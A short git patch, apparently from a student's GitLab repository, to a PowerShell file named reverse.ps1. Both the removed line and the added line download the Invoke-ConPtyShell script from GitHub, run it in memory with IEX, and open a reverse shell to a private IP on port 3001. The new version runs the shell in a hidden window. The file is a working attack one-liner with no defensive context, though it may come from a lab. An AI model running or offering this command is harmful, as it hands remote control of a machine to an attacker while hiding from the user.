From 9f0c981877daebbd41b6d189e58e99319e438d33 Mon Sep 17 00:00:00 2001 From: andreas nyberget <andrnybe@stud.ntnu.no> Date: Tue, 24 May 2022 10:57:47 +0000 Subject: [PATCH] Update reverse.ps1 --- reverse.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/reverse.ps1 b/reverse.ps1 index b239828..05fba42 100644 --- a/reverse.ps1 +++ b/reverse.ps1 @@ -1 +1 @@ -IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 172.21.199.93 3001 \ No newline at end of file +PowerShell.exe -WindowStyle hidden {IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 172.21.200.144 3001} -- GitLab